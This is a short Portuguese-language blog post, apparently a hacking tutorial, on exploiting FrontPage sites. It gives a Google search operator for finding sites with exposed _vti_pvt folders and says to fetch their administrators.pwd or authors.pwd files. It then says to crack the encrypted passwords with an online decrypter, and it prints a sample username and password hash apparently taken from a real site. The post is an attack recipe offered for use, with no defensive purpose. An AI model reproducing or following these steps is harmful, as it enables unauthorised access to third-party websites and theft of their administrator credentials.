1º primeiro abra o Google, digite: inurl:_vti_pvt isso localiza sites feitos em frontpage, pois o frontpage cria essas pastas. 2º Explorando a vulnerabilidade. clique em um site da pesquisa feita por: inurl:_vti_pvt exemplo: se der para explorar a vulnerabilidade aparecerá o usuário seguido da senha # -FrontPage- A senha virá criptografada, procure um decripter no google
e adicione ao final da url:
administrators.pwd OU authors.pwd
http://www.site/_vti_pvt/administrators.pwd
ex:
21stcapital:RzSXiKATauHFI
0 comentários:
Postar um comentário